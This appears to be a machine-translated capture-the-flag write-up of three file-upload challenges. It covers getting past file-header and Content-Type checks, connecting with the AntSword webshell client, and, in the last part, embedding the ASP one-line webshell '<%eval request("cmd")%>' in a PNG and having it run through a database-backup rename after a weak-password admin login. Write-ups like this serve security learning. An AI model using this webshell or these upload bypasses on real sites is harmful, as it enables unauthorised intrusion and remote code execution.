Third question

It is also a familiar interface for uploading files , Upload a word of Trojan , no way   however png gif jpg That's ok ,  But the picture horse just can't ???? That should be the detection of file headers ( At first, I thought it was right MIME Limitations of type , If the picture is not good, it means that it is not right MIME Limitations of type )

Add... Before a sentence GIF89a, Upload

Oh, sure enough, it's the detection of file headers , As always, use ant sword connection to find key File found flag

  Fourth question

I am so tired today , Write again tomorrow

Come on, come on

Upload casually php have a look , no way , Then upload a picture and find it feasible , Since the last question is about the detection of file headers Then this question should be right Content-Type Detection of

Upload php, Grab the bag , take content-type Change to the type that can be uploaded （ image jpg png gif ）

As always, , Ant sword connection found key File can .

  Fifth question （ I don't quite understand , I'll make up for it later ）

A publishing site ？？？asp Script ？？？ Look at backstage management

  The background path is obvious , Then log in with weak password in the background （ There is still a place that I don't understand , If the verification code cannot be reused, the form must be resubmitted for login , Is it because of this that weak password blasting cannot be carried out ）

You can see article management and data processing , As the name suggests, article management is file upload

Then we will asp Code <%eval request("cmd")%> Combine with the picture to make a picture horse , The code is as follows ：

copy 1.asp /b + 1.png /a  webshell.png 

Upload the picture

  Copy the path to the data processing place to the current database path , Change the database name to XXX.asp( and php It's almost the same , It's just that the language is different hahaha ), The backup data

  Get the following

  As always, use ant sword to connect , The path is a .....( Omitted )/admin/Databackup/1.asp   

Stuck for a long time when using ant sword link , The path has always been wrong , Finally, I found that I didn't add admin Purring

 key The file in intpub Under the directory ！！！